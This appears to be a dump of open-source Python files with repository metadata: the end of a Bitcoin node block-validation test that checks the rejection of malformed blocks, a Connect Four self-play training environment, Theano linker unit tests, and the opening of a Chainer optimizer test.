self.move_tip(60)
b63 = self.next_block(63)
b63.vtx[0].nLockTime = 0xffffffff
b63.vtx[0].vin[0].nSequence = 0xDEADBEEF
b63.vtx[0].rehash()
b63 = self.update_block(63, [])
self.sync_blocks([b63], success=False, reject_reason='bad-txns-nonfinal')
# This checks that a block with a bloated VARINT between the block_header and the array of tx such that
# the block is > MAX_BLOCK_BASE_SIZE with the bloated varint, but <= MAX_BLOCK_BASE_SIZE without the bloated varint,
# does not cause a subsequent, identical block with canonical encoding to be rejected. The test does not
# care whether the bloated block is accepted or rejected; it only cares that the second block is accepted.
#
# What matters is that the receiving node should not reject the bloated block, and then reject the canonical
# block on the basis that it's the same as an already-rejected block (which would be a consensus failure.)
#
# -> b39 (11) -> b42 (12) -> b43 (13) -> b53 (14) -> b55 (15) -> b57 (16) -> b60 (17) -> b64 (18)
# \
# b64a (18)
# b64a is a bloated block (non-canonical varint)
# b64 is a good block (same as b64 but w/ canonical varint)
#
self.log.info("Accept a valid block even if a bloated version of the block has previously been sent")
self.move_tip(60)
regular_block = self.next_block("64a", spend=out[18])
# make it a "broken_block," with non-canonical serialization
b64a = CBrokenBlock(regular_block)
b64a.initialize(regular_block)
self.blocks["64a"] = b64a
self.tip = b64a
tx = CTransaction()
# use canonical serialization to calculate size
script_length = 1000000 - len(b64a.normal_serialize()) - 69
script_output = CScript([b'\x00' * script_length])
tx.vout.append(CTxOut(0, script_output))
tx.vin.append(CTxIn(COutPoint(b64a.vtx[1].sha256, 0)))
b64a = self.update_block("64a", [tx])
assert_equal(len(b64a.serialize()), 1000000 + 8)
self.sync_blocks([b64a], success=False, reject_reason='non-canonical ReadCompactSize()')
# bitcoind doesn't disconnect us for sending a bloated block, but if we subsequently
# resend the header message, it won't send us the getdata message again. Just
# disconnect and reconnect and then call sync_blocks.
# TODO: improve this test to be less dependent on P2P DOS behaviour.
node.disconnect_p2ps()
self.reconnect_p2p()
self.move_tip(60)
b64 = CBlock(b64a)
b64.vtx = copy.deepcopy(b64a.vtx)
assert_equal(b64.hash, b64a.hash)
assert_equal(len(b64.serialize()), 1000000)
self.blocks[64] = b64
b64 = self.update_block(64, [])
self.sync_blocks([b64], True)
self.save_spendable_output()
# Spend an output created in the block itself
#
# -> b42 (12) -> b43 (13) -> b53 (14) -> b55 (15) -> b57 (16) -> b60 (17) -> b64 (18) -> b65 (19)
#
self.log.info("Accept a block with a transaction spending an output created in the same block")
self.move_tip(64)
b65 = self.next_block(65)
tx1 = self.create_and_sign_transaction(out[19], out[19].vout[0].nValue)
tx2 = self.create_and_sign_transaction(tx1, 0)
b65 = self.update_block(65, [tx1, tx2])
self.sync_blocks([b65], True)
self.save_spendable_output()
# Attempt to spend an output created later in the same block
#
# -> b43 (13) -> b53 (14) -> b55 (15) -> b57 (16) -> b60 (17) -> b64 (18) -> b65 (19)
# \-> b66 (20)
self.log.info("Reject a block with a transaction spending an output created later in the same block")
self.move_tip(65)
b66 = self.next_block(66)
tx1 = self.create_and_sign_transaction(out[20], out[20].vout[0].nValue)
tx2 = self.create_and_sign_transaction(tx1, 1)
b66 = self.update_block(66, [tx2, tx1])
self.sync_blocks([b66], success=False, reject_reason='bad-txns-inputs-missingorspent', reconnect=True)
# Attempt to double-spend a transaction created in a block
#
# -> b43 (13) -> b53 (14) -> b55 (15) -> b57 (16) -> b60 (17) -> b64 (18) -> b65 (19)
# \-> b67 (20)
#
#
self.log.info("Reject a block with a transaction double spending a transaction created in the same block")
self.move_tip(65)
b67 = self.next_block(67)
tx1 = self.create_and_sign_transaction(out[20], out[20].vout[0].nValue)
tx2 = self.create_and_sign_transaction(tx1, 1)
tx3 = self.create_and_sign_transaction(tx1, 2)
b67 = self.update_block(67, [tx1, tx2, tx3])
self.sync_blocks([b67], success=False, reject_reason='bad-txns-inputs-missingorspent', reconnect=True)
# More tests of block subsidy
#
# -> b43 (13) -> b53 (14) -> b55 (15) -> b57 (16) -> b60 (17) -> b64 (18) -> b65 (19) -> b69 (20)
# \-> b68 (20)
#
# b68 - coinbase with an extra 10 satoshis,
# creates a tx that has 9 satoshis from out[20] go to fees
# this fails because the coinbase is trying to claim 1 satoshi too much in fees
#
# b69 - coinbase with extra 10 satoshis, and a tx that gives a 10 satoshi fee
# this succeeds
#
self.log.info("Reject a block trying to claim too much subsidy in the coinbase transaction")
self.move_tip(65)
b68 = self.next_block(68, additional_coinbase_value=10)
tx = self.create_and_sign_transaction(out[20], out[20].vout[0].nValue - 9)
b68 = self.update_block(68, [tx])
self.sync_blocks([b68], success=False, reconnect=True)
self.log.info("Accept a block claiming the correct subsidy in the coinbase transaction")
self.move_tip(65)
b69 = self.next_block(69, additional_coinbase_value=10)
tx = self.create_and_sign_transaction(out[20], out[20].vout[0].nValue - 10)
self.update_block(69, [tx])
self.sync_blocks([b69], True)
self.save_spendable_output()
# Test spending the outpoint of a non-existent transaction
#
# -> b53 (14) -> b55 (15) -> b57 (16) -> b60 (17) -> b64 (18) -> b65 (19) -> b69 (20)
# \-> b70 (21)
#
self.log.info("Reject a block containing a transaction spending from a non-existent input")
self.move_tip(69)
b70 = self.next_block(70, spend=out[21])
bogus_tx = CTransaction()
bogus_tx.sha256 = uint256_from_str(b"23c70ed7c0506e9178fc1a987f40a33946d4ad4c962b5ae3a52546da53af0c5c")
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(bogus_tx.sha256, 0), b"", 0xffffffff))
tx.vout.append(CTxOut(1, b""))
b70 = self.update_block(70, [tx])
self.sync_blocks([b70], success=False, reject_reason='bad-txns-inputs-missingorspent', reconnect=True)
# Test accepting an invalid block which has the same hash as a valid one (via merkle tree tricks)
#
# -> b53 (14) -> b55 (15) -> b57 (16) -> b60 (17) -> b64 (18) -> b65 (19) -> b69 (20) -> b72 (21)
# \-> b71 (21)
#
# b72 is a good block.
# b71 is a copy of 72, but re-adds one of its transactions. However, it has the same hash as b72.
self.log.info("Reject a block containing a duplicate transaction but with the same Merkle root (Merkle tree malleability")
self.move_tip(69)
b72 = self.next_block(72)
tx1 = self.create_and_sign_transaction(out[21], 2)
tx2 = self.create_and_sign_transaction(tx1, 1)
b72 = self.update_block(72, [tx1, tx2]) # now tip is 72
b71 = copy.deepcopy(b72)
b71.vtx.append(tx2) # add duplicate tx2
self.block_heights[b71.sha256] = self.block_heights[b69.sha256] + 1 # b71 builds off b69
self.blocks[71] = b71
assert_equal(len(b71.vtx), 4)
assert_equal(len(b72.vtx), 3)
assert_equal(b72.sha256, b71.sha256)
self.move_tip(71)
self.sync_blocks([b71], success=False, reject_reason='bad-txns-duplicate', reconnect=True)
self.move_tip(72)
self.sync_blocks([b72], True)
self.save_spendable_output()
# Test some invalid scripts and MAX_BLOCK_SIGOPS
#
# -> b55 (15) -> b57 (16) -> b60 (17) -> b64 (18) -> b65 (19) -> b69 (20) -> b72 (21)
# \-> b** (22)
#
# b73 - tx with excessive sigops that are placed after an excessively large script element.
# The purpose of the test is to make sure those sigops are counted.
#
# script is a bytearray of size 20,526
#
# bytearray[0-19,998] : OP_CHECKSIG
# bytearray[19,999] : OP_PUSHDATA4
# bytearray[20,000-20,003]: 521 (max_script_element_size+1, in little-endian format)
# bytearray[20,004-20,525]: unread data (script_element)
# bytearray[20,526] : OP_CHECKSIG (this puts us over the limit)
self.log.info("Reject a block containing too many sigops after a large script element")
self.move_tip(72)
b73 = self.next_block(73)
size = MAX_BLOCK_SIGOPS - 1 + MAX_SCRIPT_ELEMENT_SIZE + 1 + 5 + 1
a = bytearray([OP_CHECKSIG] * size)
a[MAX_BLOCK_SIGOPS - 1] = int("4e", 16) # OP_PUSHDATA4
element_size = MAX_SCRIPT_ELEMENT_SIZE + 1
a[MAX_BLOCK_SIGOPS] = element_size % 256
a[MAX_BLOCK_SIGOPS + 1] = element_size // 256
a[MAX_BLOCK_SIGOPS + 2] = 0
a[MAX_BLOCK_SIGOPS + 3] = 0
tx = self.create_and_sign_transaction(out[22], 1, CScript(a))
b73 = self.update_block(73, [tx])
assert_equal(get_legacy_sigopcount_block(b73), MAX_BLOCK_SIGOPS + 1)
self.sync_blocks([b73], success=False, reject_reason='bad-blk-sigops', reconnect=True)
# b74/75 - if we push an invalid script element, all previous sigops are counted,
# but sigops after the element are not counted.
#
# The invalid script element is that the push_data indicates that
# there will be a large amount of data (0xffffff bytes), but we only
# provide a much smaller number. These bytes are CHECKSIGS so they would
# cause b75 to fail for excessive sigops, if those bytes were counted.
#
# b74 fails because we put MAX_BLOCK_SIGOPS+1 before the element
# b75 succeeds because we put MAX_BLOCK_SIGOPS before the element
self.log.info("Check sigops are counted correctly after an invalid script element")
self.move_tip(72)
b74 = self.next_block(74)
size = MAX_BLOCK_SIGOPS - 1 + MAX_SCRIPT_ELEMENT_SIZE + 42 # total = 20,561
a = bytearray([OP_CHECKSIG] * size)
a[MAX_BLOCK_SIGOPS] = 0x4e
a[MAX_BLOCK_SIGOPS + 1] = 0xfe
a[MAX_BLOCK_SIGOPS + 2] = 0xff
a[MAX_BLOCK_SIGOPS + 3] = 0xff
a[MAX_BLOCK_SIGOPS + 4] = 0xff
tx = self.create_and_sign_transaction(out[22], 1, CScript(a))
b74 = self.update_block(74, [tx])
self.sync_blocks([b74], success=False, reject_reason='bad-blk-sigops', reconnect=True)
self.move_tip(72)
b75 = self.next_block(75)
size = MAX_BLOCK_SIGOPS - 1 + MAX_SCRIPT_ELEMENT_SIZE + 42
a = bytearray([OP_CHECKSIG] * size)
a[MAX_BLOCK_SIGOPS - 1] = 0x4e
a[MAX_BLOCK_SIGOPS] = 0xff
a[MAX_BLOCK_SIGOPS + 1] = 0xff
a[MAX_BLOCK_SIGOPS + 2] = 0xff
a[MAX_BLOCK_SIGOPS + 3] = 0xff
tx = self.create_and_sign_transaction(out[22], 1, CScript(a))
b75 = self.update_block(75, [tx])
self.sync_blocks([b75], True)
self.save_spendable_output()
# Check that if we push an element filled with CHECKSIGs, they are not counted
self.move_tip(75)
b76 = self.next_block(76)
size = MAX_BLOCK_SIGOPS - 1 + MAX_SCRIPT_ELEMENT_SIZE + 1 + 5
a = bytearray([OP_CHECKSIG] * size)
a[MAX_BLOCK_SIGOPS - 1] = 0x4e # PUSHDATA4, but leave the following bytes as just checksigs
tx = self.create_and_sign_transaction(out[23], 1, CScript(a))
b76 = self.update_block(76, [tx])
self.sync_blocks([b76], True)
self.save_spendable_output()
# Test transaction resurrection
#
# -> b77 (24) -> b78 (25) -> b79 (26)
# \-> b80 (25) -> b81 (26) -> b82 (27)
#
# b78 creates a tx, which is spent in b79. After b82, both should be in mempool
#
# The tx'es must be unsigned and pass the node's mempool policy. It is unsigned for the
# rather obscure reason that the Python signature code does not distinguish between
# Low-S and High-S values (whereas the bitcoin code has custom code which does so);
# as a result of which, the odds are 50% that the python code will use the right
# value and the transaction will be accepted into the mempool. Until we modify the
# test framework to support low-S signing, we are out of luck.
#
# To get around this issue, we construct transactions which are not signed and which
# spend to OP_TRUE. If the standard-ness rules change, this test would need to be
# updated. (Perhaps to spend to a P2SH OP_TRUE script)
self.log.info("Test transaction resurrection during a re-org")
self.move_tip(76)
b77 = self.next_block(77)
tx77 = self.create_and_sign_transaction(out[24], 10 * COIN)
b77 = self.update_block(77, [tx77])
self.sync_blocks([b77], True)
self.save_spendable_output()
b78 = self.next_block(78)
tx78 = self.create_tx(tx77, 0, 9 * COIN)
b78 = self.update_block(78, [tx78])
self.sync_blocks([b78], True)
b79 = self.next_block(79)
tx79 = self.create_tx(tx78, 0, 8 * COIN)
b79 = self.update_block(79, [tx79])
self.sync_blocks([b79], True)
# mempool should be empty
assert_equal(len(self.nodes[0].getrawmempool()), 0)
self.move_tip(77)
b80 = self.next_block(80, spend=out[25])
self.sync_blocks([b80], False, force_send=True)
self.save_spendable_output()
b81 = self.next_block(81, spend=out[26])
self.sync_blocks([b81], False, force_send=True) # other chain is same length
self.save_spendable_output()
b82 = self.next_block(82, spend=out[27])
self.sync_blocks([b82], True) # now this chain is longer, triggers re-org
self.save_spendable_output()
# now check that tx78 and tx79 have been put back into the peer's mempool
mempool = self.nodes[0].getrawmempool()
assert_equal(len(mempool), 2)
assert(tx78.hash in mempool)
assert(tx79.hash in mempool)
# Test invalid opcodes in dead execution paths.
#
# -> b81 (26) -> b82 (27) -> b83 (28)
#
self.log.info("Accept a block with invalid opcodes in dead execution paths")
b83 = self.next_block(83)
op_codes = [OP_IF, OP_INVALIDOPCODE, OP_ELSE, OP_TRUE, OP_ENDIF]
script = CScript(op_codes)
tx1 = self.create_and_sign_transaction(out[28], out[28].vout[0].nValue, script)
tx2 = self.create_and_sign_transaction(tx1, 0, CScript([OP_TRUE]))
tx2.vin[0].scriptSig = CScript([OP_FALSE])
tx2.rehash()
b83 = self.update_block(83, [tx1, tx2])
self.sync_blocks([b83], True)
self.save_spendable_output()
# Reorg on/off blocks that have OP_RETURN in them (and try to spend them)
#
# -> b81 (26) -> b82 (27) -> b83 (28) -> b84 (29) -> b87 (30) -> b88 (31)
# \-> b85 (29) -> b86 (30) \-> b89a (32)
#
self.log.info("Test re-orging blocks with OP_RETURN in them")
b84 = self.next_block(84)
tx1 = self.create_tx(out[29], 0, 0, CScript([OP_RETURN]))
tx1.vout.append(CTxOut(0, CScript([OP_TRUE])))
tx1.vout.append(CTxOut(0, CScript([OP_TRUE])))
tx1.vout.append(CTxOut(0, CScript([OP_TRUE])))
tx1.vout.append(CTxOut(0, CScript([OP_TRUE])))
tx1.calc_sha256()
self.sign_tx(tx1, out[29])
tx1.rehash()
tx2 = self.create_tx(tx1, 1, 0, CScript([OP_RETURN]))
tx2.vout.append(CTxOut(0, CScript([OP_RETURN])))
tx3 = self.create_tx(tx1, 2, 0, CScript([OP_RETURN]))
tx3.vout.append(CTxOut(0, CScript([OP_TRUE])))
tx4 = self.create_tx(tx1, 3, 0, CScript([OP_TRUE]))
tx4.vout.append(CTxOut(0, CScript([OP_RETURN])))
tx5 = self.create_tx(tx1, 4, 0, CScript([OP_RETURN]))
b84 = self.update_block(84, [tx1, tx2, tx3, tx4, tx5])
self.sync_blocks([b84], True)
self.save_spendable_output()
self.move_tip(83)
b85 = self.next_block(85, spend=out[29])
self.sync_blocks([b85], False) # other chain is same length
b86 = self.next_block(86, spend=out[30])
self.sync_blocks([b86], True)
self.move_tip(84)
b87 = self.next_block(87, spend=out[30])
self.sync_blocks([b87], False) # other chain is same length
self.save_spendable_output()
b88 = self.next_block(88, spend=out[31])
self.sync_blocks([b88], True)
self.save_spendable_output()
# trying to spend the OP_RETURN output is rejected
b89a = self.next_block("89a", spend=out[32])
tx = self.create_tx(tx1, 0, 0, CScript([OP_TRUE]))
b89a = self.update_block("89a", [tx])
self.sync_blocks([b89a], success=False, reject_reason='bad-txns-inputs-missingorspent', reconnect=True)
self.log.info("Test a re-org of one week's worth of blocks (1088 blocks)")
self.move_tip(88)
LARGE_REORG_SIZE = 10
blocks = []
spend = out[32]
for i in range(89, LARGE_REORG_SIZE + 89):
b = self.next_block(i, spend, version=4)
tx = CTransaction()
script_length = 1000000 - len(b.serialize()) - 69
script_output = CScript([b'\x00' * script_length])
tx.vout.append(CTxOut(0, script_output))
tx.vin.append(CTxIn(COutPoint(b.vtx[1].sha256, 0)))
b = self.update_block(i, [tx])
assert_equal(len(b.serialize()), 1000000)
blocks.append(b)
self.save_spendable_output()
spend = self.get_spendable_output()
self.sync_blocks(blocks, True, timeout=480)
chain1_tip = i
# now create alt chain of same length
self.move_tip(88)
blocks2 = []
for i in range(89, LARGE_REORG_SIZE + 89):
blocks2.append(self.next_block("alt" + str(i), version=4))
self.sync_blocks(blocks2, False, force_send=True)
# extend alt chain to trigger re-org
block = self.next_block("alt" + str(chain1_tip + 1), version=4)
self.sync_blocks([block], True, timeout=480)
# ... and re-org back to the first chain
self.move_tip(chain1_tip)
block = self.next_block(chain1_tip + 1, version=4)
self.sync_blocks([block], False, force_send=True)
block = self.next_block(chain1_tip + 2, version=4)
self.sync_blocks([block], True, timeout=480)
time.sleep(1)
self.log.info("Reject a block with an invalid block header version")
b_v1 = self.next_block('b_v1', version=1)
self.sync_blocks([b_v1], success=False, force_send=True, reject_reason='bad-version(0x00000001)')
self.move_tip(chain1_tip + 2)
b_cb34 = self.next_block('b_cb34', version=4)
b_cb34.vtx[0].vin[0].scriptSig = b_cb34.vtx[0].vin[0].scriptSig[:-1]
b_cb34.vtx[0].rehash()
b_cb34.hashMerkleRoot = b_cb34.calc_merkle_root()
b_cb34.solve()
self.sync_blocks([b_cb34], success=False, reject_reason='block height mismatch in coinbase', force_send=True)
# Helper methods
    ################
def add_transactions_to_block(self, block, tx_list):
[tx.rehash() for tx in tx_list]
block.vtx.extend(tx_list)
# this is a little handier to use than the version in blocktools.py
def create_tx(self, spend_tx, n, value, script=CScript([OP_TRUE, OP_DROP] * 15 + [OP_TRUE])):
return create_tx_with_script(spend_tx, n, amount=value, script_pub_key=script)
# sign a transaction, using the key we know about
# this signs input 0 in tx, which is assumed to be spending output n in spend_tx
def sign_tx(self, tx, spend_tx):
scriptPubKey = bytearray(spend_tx.vout[0].scriptPubKey)
if (scriptPubKey[0] == OP_TRUE): # an anyone-can-spend
tx.vin[0].scriptSig = CScript()
return
(sighash, err) = SignatureHash(spend_tx.vout[0].scriptPubKey, tx, 0, SIGHASH_ALL)
tx.vin[0].scriptSig = CScript([self.coinbase_key.sign_ecdsa(sighash) + bytes(bytearray([SIGHASH_ALL]))])
def create_and_sign_transaction(self, spend_tx, value, script=CScript([OP_TRUE])):
tx = self.create_tx(spend_tx, 0, value, script)
self.sign_tx(tx, spend_tx)
tx.rehash()
return tx
def next_block(self, number, spend=None, additional_coinbase_value=0, script=CScript([OP_TRUE]), solve=True, *, version=4):
if self.tip is None:
base_block_hash = self.genesis_hash
block_time = int(time.time()) + 1
else:
base_block_hash = self.tip.sha256
block_time = self.tip.nTime + 1
# First create the coinbase
height = self.block_heights[base_block_hash] + 1
coinbase = create_coinbase(height, self.coinbase_pubkey)
coinbase.vout[0].nValue += additional_coinbase_value
coinbase.rehash()
if spend is None:
block = create_block(base_block_hash, coinbase, block_time, version=version)
else:
coinbase.vout[0].nValue += spend.vout[0].nValue - 1 # all but one satoshi to fees
coinbase.rehash()
block = create_block(base_block_hash, coinbase, block_time, version=version)
tx = self.create_tx(spend, 0, 1, script) # spend 1 satoshi
self.sign_tx(tx, spend)
self.add_transactions_to_block(block, [tx])
block.hashMerkleRoot = block.calc_merkle_root()
if solve:
block.solve()
self.tip = block
self.block_heights[block.sha256] = height
assert number not in self.blocks
self.blocks[number] = block
return block
# save the current tip so it can be spent by a later block
def save_spendable_output(self):
self.log.debug("saving spendable output %s" % self.tip.vtx[0])
self.spendable_outputs.append(self.tip)
# get an output that we previously marked as spendable
def get_spendable_output(self):
self.log.debug("getting spendable output %s" % self.spendable_outputs[0].vtx[0])
return self.spendable_outputs.pop(0).vtx[0]
# move the tip back to a previous block
def move_tip(self, number):
self.tip = self.blocks[number]
# adds transactions to the block and updates state
def update_block(self, block_number, new_transactions):
block = self.blocks[block_number]
self.add_transactions_to_block(block, new_transactions)
old_sha256 = block.sha256
block.hashMerkleRoot = block.calc_merkle_root()
block.solve()
# Update the internal state just like in next_block
self.tip = block
if block.sha256 != old_sha256:
self.block_heights[block.sha256] = self.block_heights[old_sha256]
del self.block_heights[old_sha256]
self.blocks[block_number] = block
return block
def bootstrap_p2p(self, timeout=10):
"""Add a P2P connection to the node.
Helper to connect and wait for version handshake."""
self.nodes[0].add_p2p_connection(P2PDataStore())
# We need to wait for the initial getheaders from the peer before we
# start populating our blockstore. If we don't, then we may run ahead
# to the next subtest before we receive the getheaders. We'd then send
# an INV for the next block and receive two getheaders - one for the
# IBD and one for the INV. We'd respond to both and could get
# unexpectedly disconnected if the DoS score for that error is 50.
self.nodes[0].p2p.wait_for_getheaders(timeout=timeout)
def reconnect_p2p(self, timeout=60):
"""Tear down and bootstrap the P2P connection to the node.
The node gets disconnected several times in this test. This helper
method reconnects the p2p and restarts the network thread."""
self.nodes[0].disconnect_p2ps()
self.bootstrap_p2p(timeout=timeout)
def sync_blocks(self, blocks, success=True, reject_reason=None, force_send=False, reconnect=False, timeout=60):
"""Sends blocks to test node. Syncs and verifies that tip has advanced to most recent block.
Call with success = False if the tip shouldn't advance to the most recent block."""
self.nodes[0].p2p.send_blocks_and_test(blocks, self.nodes[0], success=success, reject_reason=reject_reason, force_send=force_send, timeout=timeout, expect_disconnect=reconnect)
if reconnect:
self.reconnect_p2p(timeout=timeout)
if __name__ == '__main__':
FullBlockTest().main()
| 46.509804 | 184 | 0.584598 |
75c36dda4c76a28b49d5c811c321b54af326ede4 | 2,795 | py | Python | connectfour/agent/environment.py | Lando-L/connect-four | 35be8b41443bd357b2b30678237a4581f3543aac | [
"MIT"
] | null | null | null | connectfour/agent/environment.py | Lando-L/connect-four | 35be8b41443bd357b2b30678237a4581f3543aac | [
"MIT"
] | null | null | null | connectfour/agent/environment.py | Lando-L/connect-four | 35be8b41443bd357b2b30678237a4581f3543aac | [
"MIT"
] | null | null | null | import os
from typing import Tuple
import numpy as np
from connectfour.agent.memory import AgentMemory
from connectfour.agent.model import AgentModel
from connectfour.game import gamestate
from connectfour.tools.mcts.tree import MCTSTree
class AgentEnvironment:
def __init__(self, observation_space: Tuple, action_space: int, value_space: int) -> None:
self.action_space = action_space
self.observation_space = observation_space
self.value_space = value_space
self.memory = AgentMemory()
self.model = AgentModel(observation_space, action_space, value_space)
self.tree = MCTSTree(gamestate.step, gamestate.valid_actions, self.model.evaluate)
self.histories = []
def evaluate(self, num_simulations: int, exploration_constant: float, temperature: float) -> None:
state = gamestate.empty()
episode = []
outcome = None
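        # Self-play: run MCTS from the current position, sample a move from the
        # visit-count distribution, and record each (state, policy) pair for training.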
while outcome is None:
self.tree.reset(state)
probabilities = self.tree.simulate(num_simulations, exploration_constant, temperature, state.player)
actions = np.array([probabilities.get(i, 0) for i in range(self.action_space)])
action = np.random.choice(np.arange(self.action_space), p=actions)
episode.append((state, actions))
state, outcome = gamestate.step(state, action)
for state, action in episode:
self.memory.store((state, action, outcome))
self.memory.store((
gamestate.GameState(
board=np.fliplr(state.board),
depths=state.depths,
player=state.player
), action, outcome
))
def improve(self, num_samples: int, batch_size: int, epochs: int) -> None:
states, actions, outcomes = self.memory.sample(num_samples)
history = self.model.train(states, actions, outcomes, batch_size, epochs)
self.histories.append(history)
def iterate(self,
num_iterations: int,
checkpoint: int,
path: str,
num_simulations: int,
exploration_constant: float,
temperature: float,
samples: int,
batch_size: int,
epochs: int) -> None:
for i in range(1, num_iterations + 1):
self.evaluate(num_simulations, exploration_constant, temperature)
self.improve(samples, batch_size, epochs)
if i % checkpoint == 0:
print(f'Saving model at checkpoint {i}')
self.model.save(os.path.join(path, f'checkpoint_{i}_model.h5'))
self.model.save(os.path.join(path, 'model.h5'))
self.memory.save(os.path.join(path, 'memory.pickle'))
| 36.298701 | 112 | 0.620036 |
1d56ac8bd6e9f69dda6177d90df70ed873910b3f | 6,263 | py | Python | Theano-master/theano/gof/tests/test_link.py | JuliusSchwartz/FlowMO | e221d989914f906501e1ad19cd3629d88eac1785 | [
"MIT"
] | 95 | 2019-05-14T20:55:26.000Z | 2022-03-26T13:32:42.000Z | Theano-master/theano/gof/tests/test_link.py | JuliusSchwartz/FlowMO | e221d989914f906501e1ad19cd3629d88eac1785 | [
"MIT"
] | 7 | 2019-11-25T08:24:47.000Z | 2021-09-12T13:29:14.000Z | Theano-master/theano/gof/tests/test_link.py | JuliusSchwartz/FlowMO | e221d989914f906501e1ad19cd3629d88eac1785 | [
"MIT"
] | 24 | 2019-05-14T20:55:38.000Z | 2022-01-16T11:29:39.000Z | from __future__ import absolute_import, print_function, division
from copy import deepcopy
import unittest
import numpy
import theano
from theano.gof import graph
from theano.gof.graph import Variable, Apply, Constant
from theano.gof.type import Type
from theano.gof.op import Op
from theano.gof import fg
from theano.gof.link import * # noqa
from theano.compat import cmp
def as_variable(x):
assert isinstance(x, Variable)
return x
class TDouble(Type):
def filter(self, data):
return float(data)
tdouble = TDouble()
def double(name):
return Variable(tdouble, None, None, name=name)
class MyOp(Op):
__props__ = ("nin", "name", "impl")
def __init__(self, nin, name, impl=None):
self.nin = nin
self.name = name
if impl:
self.impl = impl
def make_node(self, *inputs):
assert len(inputs) == self.nin
inputs = [as_variable(i) for i in inputs]
for input in inputs:
if input.type is not tdouble:
raise Exception("Error 1")
outputs = [double(self.name + "_R")]
return Apply(self, inputs, outputs)
def __str__(self):
return self.name
def perform(self, node, inputs, out_):
out, = out_
out[0] = self.impl(*inputs)
add = MyOp(2, 'Add', lambda x, y: x + y)
sub = MyOp(2, 'Sub', lambda x, y: x - y)
mul = MyOp(2, 'Mul', lambda x, y: x * y)
div = MyOp(2, 'Div', lambda x, y: x / y)
def notimpl(self, x):
raise NotImplementedError()
raise_err = MyOp(1, 'RaiseErr', notimpl)
def inputs():
x = double('x')
y = double('y')
z = double('z')
return x, y, z
def perform_linker(fgraph):
lnk = PerformLinker().accept(fgraph)
return lnk
def FunctionGraph(inputs, outputs):
e = fg.FunctionGraph(inputs, outputs)
return e
class TestPerformLinker(unittest.TestCase):
def test_thunk(self):
x, y, z = inputs()
e = mul(add(x, y), div(x, y))
fn, i, o = perform_linker(FunctionGraph([x, y, z], [e])).make_thunk()
i[0].data = 1
i[1].data = 2
fn()
assert o[0].data == 1.5
def test_function(self):
x, y, z = inputs()
e = mul(add(x, y), div(x, y))
fn = perform_linker(FunctionGraph([x, y, z], [e])).make_function()
assert fn(1.0, 2.0, 3.0) == 1.5
def test_constant(self):
x, y, z = inputs()
y = Constant(tdouble, 2.0)
e = mul(add(x, y), div(x, y))
fn = perform_linker(FunctionGraph([x], [e])).make_function()
assert fn(1.0) == 1.5
def test_input_output_same(self):
x, y, z = inputs()
fn = perform_linker(FunctionGraph([x], [x])).make_function()
assert 1.0 is fn(1.0)
def test_input_dependency0(self):
x, y, z = inputs()
a, d = add(x, y), div(x, y)
e = mul(a, d)
fn = perform_linker(FunctionGraph(*graph.clone([x, y, a],
[e]))).make_function()
assert fn(1.0, 2.0, 9.0) == 4.5
def test_skiphole(self):
x, y, z = inputs()
a = add(x, y)
r = raise_err(a)
e = add(r, a)
fn = perform_linker(FunctionGraph(*graph.clone([x, y, r],
[e]))).make_function()
assert fn(1.0, 2.0, 4.5) == 7.5
def wrap_linker(fgraph, linkers, wrapper):
lnk = WrapLinker(linkers, wrapper).accept(fgraph)
return lnk
class TestWrapLinker(unittest.TestCase):
def test_0(self):
nodes = []
def wrap(i, node, th):
nodes.append(node.op)
x, y, z = inputs()
e = mul(add(x, y), div(x, y))
fn, i, o = wrap_linker(
FunctionGraph([x, y, z], [e]),
[PerformLinker(allow_gc=False)], wrap).make_thunk()
i[0].data = 1
i[1].data = 2
fn()
assert nodes == [div, add, mul]
assert o[0].data is None
def test_1(self):
nodes = []
def wrap(i, node, th):
nodes.append(node.op)
th()
x, y, z = inputs()
e = mul(add(x, y), div(x, y))
fn, i, o = wrap_linker(
FunctionGraph([x, y, z], [e]),
[PerformLinker(allow_gc=False)], wrap).make_thunk()
i[0].data = 1
i[1].data = 2
fn()
assert nodes == [div, add, mul]
assert o[0].data == 1.5
def test_sort_schedule_fn():
import theano
from theano.gof.sched import sort_schedule_fn, make_depends
x = theano.tensor.matrix('x')
y = theano.tensor.dot(x[:5] * 2, x.T + 1).T
def str_cmp(a, b):
return cmp(str(a), str(b)) # lexicographical sort
linker = theano.OpWiseCLinker(schedule=sort_schedule_fn(str_cmp))
mode = theano.Mode(linker=linker)
f = theano.function((x,), (y,), mode=mode)
nodes = f.maker.linker.make_all()[-1]
depends = make_depends()
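    # Consecutive nodes that are not dependency-ordered must respect the
    # lexicographical schedule imposed above.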
for a, b in zip(nodes[:-1], nodes[1:]):
if not depends((b, a)):
assert str(a) < str(b)
def test_container_deepcopy():
"""
This is a test to a work around a NumPy bug.
"""
t = theano.tensor.scalar()
# It seam that numpy.asarray(0.).astype(floatX) can return a numpy
# scalar with some NumPy Version. So we call numpy.asarray with
# the dtype parameter.
v = numpy.asarray(0., dtype=theano.config.floatX)
assert isinstance(v, numpy.ndarray), type(v)
for readonly in [True, False]:
c = Container(t, [v], readonly=readonly)
assert isinstance(c.storage[0], numpy.ndarray), (c.storage[0],
type(c.storage[0]))
assert c.storage[0].dtype == v.dtype, (c.storage[0].dtype, v.dtype)
assert c.storage[0].dtype == c.type.dtype, (c.storage[0].dtype,
c.type.dtype)
d = deepcopy(c)
assert isinstance(d.storage[0], numpy.ndarray), (d.storage[0],
type(d.storage[0]))
assert d.storage[0].dtype == v.dtype, (d.storage[0].dtype, v.dtype)
assert d.storage[0].dtype == c.type.dtype, (d.storage[0].dtype,
c.type.dtype)
| 28.339367 | 77 | 0.544627 |
5266fcbf47370baaeecc1ec0dcc6ca77236cec94 | 10,781 | py | Python | tests/chainer_tests/optimizers_tests/test_optimizers.py | zjzh/chainer | e9da1423255c58c37be9733f51b158aa9b39dc93 | [
"MIT"
] | 3,705 | 2017-06-01T07:36:12.000Z | 2022-03-30T10:46:15.000Z | tests/chainer_tests/optimizers_tests/test_optimizers.py | zjzh/chainer | e9da1423255c58c37be9733f51b158aa9b39dc93 | [
"MIT"
] | 5,998 | 2017-06-01T06:40:17.000Z | 2022-03-08T01:42:44.000Z | tests/chainer_tests/optimizers_tests/test_optimizers.py | zjzh/chainer | e9da1423255c58c37be9733f51b158aa9b39dc93 | [
"MIT"
] | 1,150 | 2017-06-02T03:39:46.000Z | 2022-03-29T02:29:32.000Z | import pickle
import unittest
import numpy as np
import six
import chainer
from chainer import functions as F
from chainer import optimizers
from chainer import testing
_all_optimizers = [
'AdaDelta',
'AdaGrad',
'Adam',
'AdamW',
